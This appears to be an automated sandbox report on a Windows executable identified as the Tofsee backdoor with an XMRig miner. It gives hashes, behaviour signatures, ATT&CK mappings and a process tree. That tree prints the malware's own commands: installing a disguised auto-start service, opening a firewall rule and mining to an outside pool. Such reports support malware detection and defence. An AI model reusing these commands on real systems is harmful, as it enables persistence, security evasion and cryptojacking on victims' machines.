Analysis

  • max time kernel
    147s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    25-02-2021 01:16

General

  • Target

    14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6.exe

  • Size

    13.6MB

  • MD5

    b3d07405f73c515ab36b61d437a97bb2

  • SHA1

    e2b044b1ede1262af7a4cb3babc2091ef2535334

  • SHA256

    14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6

  • SHA512

    aadb852b34cd31913f198150888521be45ee0fb4afbff2ef21ac3953b4bed0b84a7f54fc87d83e955f86614fb1fa93aaad82b61c9f8011fc59539a6bdffa690c

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6.exe
    "C:\Users\Admin\AppData\Local\Temp\14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:548
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uvovkgks\
      2⤵
        PID:1872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\idkhgdza.exe" C:\Windows\SysWOW64\uvovkgks\
        2⤵
          PID:1368
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create uvovkgks binPath= "C:\Windows\SysWOW64\uvovkgks\idkhgdza.exe /d\"C:\Users\Admin\AppData\Local\Temp\14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1504
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description uvovkgks "wifi internet conection"
            2⤵
              PID:376
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start uvovkgks
              2⤵
                PID:980
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1516
              • C:\Windows\SysWOW64\uvovkgks\idkhgdza.exe
                C:\Windows\SysWOW64\uvovkgks\idkhgdza.exe /d"C:\Users\Admin\AppData\Local\Temp\14f2463cd98ea4bd9189266e9743ed0f42df0980a225ba1f28722175bf25efb6.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:848
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:940
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1552

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\idkhgdza.exe
                MD5

                6bb87815075e64022ac3fc90e4bf0403

                SHA1

                b6c57069ec3882f215a8097e8a6690787076d3e0

                SHA256

                3d0eac8d9f7cf705df3c31fe2acf31bf9deec137953aabe26174bcb022d80df2

                SHA512

                018be3263aaf270bb013b63005def0f63e00e436c12fa6687f966e702da25cc9dfe1edb14b1fb6180de4bc8c5a545468321f7dd27cb51be36559038477c77127

              • C:\Windows\SysWOW64\uvovkgks\idkhgdza.exe
                MD5

                6bb87815075e64022ac3fc90e4bf0403

                SHA1

                b6c57069ec3882f215a8097e8a6690787076d3e0

                SHA256

                3d0eac8d9f7cf705df3c31fe2acf31bf9deec137953aabe26174bcb022d80df2

                SHA512

                018be3263aaf270bb013b63005def0f63e00e436c12fa6687f966e702da25cc9dfe1edb14b1fb6180de4bc8c5a545468321f7dd27cb51be36559038477c77127

              • memory/376-9-0x0000000000000000-mapping.dmp
              • memory/548-3-0x0000000000220000-0x0000000000221000-memory.dmp
                Filesize

                4KB

              • memory/548-4-0x0000000000230000-0x0000000000231000-memory.dmp
                Filesize

                4KB

              • memory/548-2-0x0000000076451000-0x0000000076453000-memory.dmp
                Filesize

                8KB

              • memory/940-14-0x00000000000C0000-0x00000000000D5000-memory.dmp
                Filesize

                84KB

              • memory/940-23-0x0000000000170000-0x0000000000180000-memory.dmp
                Filesize

                64KB

              • memory/940-22-0x0000000000150000-0x0000000000156000-memory.dmp
                Filesize

                24KB

              • memory/940-21-0x0000000001D50000-0x0000000001F5F000-memory.dmp
                Filesize

                2.1MB

              • memory/940-15-0x00000000000C9A6B-mapping.dmp
              • memory/980-10-0x0000000000000000-mapping.dmp
              • memory/1368-6-0x0000000000000000-mapping.dmp
              • memory/1504-8-0x0000000000000000-mapping.dmp
              • memory/1516-11-0x0000000000000000-mapping.dmp
              • memory/1552-24-0x0000000000150000-0x0000000000241000-memory.dmp
                Filesize

                964KB

              • memory/1552-26-0x00000000001E259C-mapping.dmp
              • memory/1872-5-0x0000000000000000-mapping.dmp